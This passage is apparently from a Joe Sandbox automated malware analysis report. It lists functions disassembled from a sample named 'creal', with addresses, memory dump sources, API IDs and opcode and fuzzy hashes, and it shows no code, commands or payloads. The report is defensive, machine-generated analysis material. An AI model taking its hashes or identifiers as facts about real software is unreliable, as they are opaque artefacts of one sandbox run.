                                                                                                                                                                                                                • Opcode Fuzzy Hash: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10A13367B28786C7EB21CB25E0107BE7F91AB65B84F048172DA8D877A1DE3DE501E701
                                                                                                                                                                                                                Function 00007FF67A6187D0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: TMP
                                                                                                                                                                                                                • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                • Opcode ID: b40e3cd0490e49b4e03091f5df65c164794e39d8e0591c1286e7656c319f7229
                                                                                                                                                                                                                • Instruction ID: fef5af383709bb6a96cf363a5bf668870444997379b53bb7fd1d682d6f23b2f7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b40e3cd0490e49b4e03091f5df65c164794e39d8e0591c1286e7656c319f7229
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF51B313F2834281FAA4AB27D90157B5A91AF94FC5F0844B5DE5DC77F6EE3CE402A202
                                                                                                                                                                                                                Function 00007FF67A623BF0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                • Opcode ID: 7569e3696a4862237eb2d75a5d3254d27d2728382b8d3a4fb7a9071d2e6cb06f
                                                                                                                                                                                                                • Instruction ID: 633771c2538b6b22f657a2a0dec7bd4cbf213f31eb04eb950394bb2553a9dd02
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7569e3696a4862237eb2d75a5d3254d27d2728382b8d3a4fb7a9071d2e6cb06f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63B09221E27A46C2EB486B116C8A21522A4BF48B00FA480B8C10C82330EE2C21B56700
                                                                                                                                                                                                                Function 00007FF67A6137E0 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e1b45cc5b539c2f4a44f5a431b63c23698d5cd8cc6c74fd81da4f2666c4fe2f5
                                                                                                                                                                                                                • Instruction ID: 6d5f69681ffc8eb2e3b3f4a60a1bbed58c291eb9fd7c53a25e45f1bdfa8f7084
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1b45cc5b539c2f4a44f5a431b63c23698d5cd8cc6c74fd81da4f2666c4fe2f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07D1C567A2864286EBAC8F25C15427F3BA0EB05F48F1446B5CE4F876B5EF39D845E340
                                                                                                                                                                                                                Function 00007FF67A6090D0 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 84ec6a3f320757ef13b53a77f9400a9296092c401b576f7c6112a1c9e532824b
                                                                                                                                                                                                                • Instruction ID: 3f7f67664682eb69732bafca0d34f1f46e3cc787e7bc9748807efd440cf8c7e9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84ec6a3f320757ef13b53a77f9400a9296092c401b576f7c6112a1c9e532824b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09C192732241E04BD2C9EB29E45957A77E1F78834DBD4443AEB8B47B89CA3CE514D710
                                                                                                                                                                                                                Function 00007FF67A612E50 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 4004e6f7831e6380f0c7a9c187e4f56c2fba6a50471e57e5591c0e9cd6f9eb67
                                                                                                                                                                                                                • Instruction ID: ce59c9994b5f71d833695011990374791a0f6eb99445a01e5c9b233584c0739d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4004e6f7831e6380f0c7a9c187e4f56c2fba6a50471e57e5591c0e9cd6f9eb67
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECB16F7392878589EBA98F39C45023E3FA1E74AF48F2441B5CA4E873A5CF39D451E744
                                                                                                                                                                                                                Function 00007FF67A61EC30 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 84378e74e3abe4b2e50357a3cae6d1c9f133da408f6cd3af500eca0aac5fc0e9
                                                                                                                                                                                                                • Instruction ID: c8c46cad4a370dc70f9b94ab200d5cc5e1b6c1324b45aa9df215508f20a839fa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84378e74e3abe4b2e50357a3cae6d1c9f133da408f6cd3af500eca0aac5fc0e9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E281F177A2878187E774CB29D48077B6E91FB86B94F044275DA9D83BA9DE3DD040AB00
                                                                                                                                                                                                                Function 00007FF67A626E70 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: e8b41cd469fbe05e0482bd49843250eff82881505c288498b80653d33dc5c17d
                                                                                                                                                                                                                • Instruction ID: 43d94f805d1d6c7e24d5c4a1ae255255500f77a821c20a2558a980fb98cdb2a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8b41cd469fbe05e0482bd49843250eff82881505c288498b80653d33dc5c17d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6361EA63E3C28246FB64CE288450BBF6681EF40F60F1546B9D62DC76E5DE7DE804AB01
                                                                                                                                                                                                                Function 00007FF67A6123A4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                                                                                                • Instruction ID: 53d04f9a4d4171df2584defb67d88ac49de913a84c3ed154794baf5434a2190f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B516077B28651C6E7248B39D05023A2BA2EB54F68F245171CA4D877F4DF3AE853E740
                                                                                                                                                                                                                Function 00007FF67A611B84 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                                                                                                • Instruction ID: d2957368d7db850c1474ebc3fe4ae827c0f4460eb557ea0048a9eceedd80d3e0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 775186B7A38A5186E7248B29C04023A3BA1EB55F68F244175CE4D977B4DF3AE893D740
                                                                                                                                                                                                                Function 00007FF67A611F94 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                                                                                                • Instruction ID: 9f8c1f7913c368774d300096c275671cc27ef93341de321cd5a15a363fe23938
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58518677A28651C6E7248B39C04023A3BA2EB54F68F244271CE5D877B4DF3AE843E740
                                                                                                                                                                                                                Function 00007FF67A6121A0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                                                                                                • Instruction ID: 1f287d1f2e609e0b2d4c7193a6888ee60d34d7735bce57d6d73a16e7bfca6d5c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3515377A28651C6E7648B39C04063E2BA2EB59F58F244171CE4D977B8CF3EE852E740
                                                                                                                                                                                                                Function 00007FF67A611980 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                                                                                                • Instruction ID: 487678d410da02578db53392fcb0074170fc944f3de05ecc86c81df956dff88b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B751A1B7A3865286E7248B29C04023A3FA1EB45F58F244179DE4C977B4DF3AE843E740
                                                                                                                                                                                                                Function 00007FF67A611D90 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                                                                                                • Instruction ID: a4ff384daeb397e64c0ceee9863b7e6588b385eb040801ae2e5b733a21550c72
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F5152B7A3865186E7248B29C04073A3BA1EB45F58F244175DE4D977B4CF3AE853E780
                                                                                                                                                                                                                Function 00007FF67A616030 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                • Instruction ID: ab6b1a0b9969d0b93a1faecf25c69b9ced7edfa54c19356867ce980a3473c042
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE41085FD3965A04E961891C87017BA2E809F12FA2D1852F4CDBE973F3CD0D758AD112
                                                                                                                                                                                                                Function 00007FF67A61A530 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                • Opcode ID: 7207d2828b21fefb3f30a877494a06cb20516b4d86b30a5eda9c739e5360529e
                                                                                                                                                                                                                • Instruction ID: 6bc66faa4d5cf779157d38f16617af17e07821c71c4fd2fa81d857f58d448154
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7207d2828b21fefb3f30a877494a06cb20516b4d86b30a5eda9c739e5360529e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81411267B24A5482FF18CF6AD9541BAA7A1AB58FD4B489032DE4DC7B68DF3CC4429300
                                                                                                                                                                                                                Function 00007FF67A617D98 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
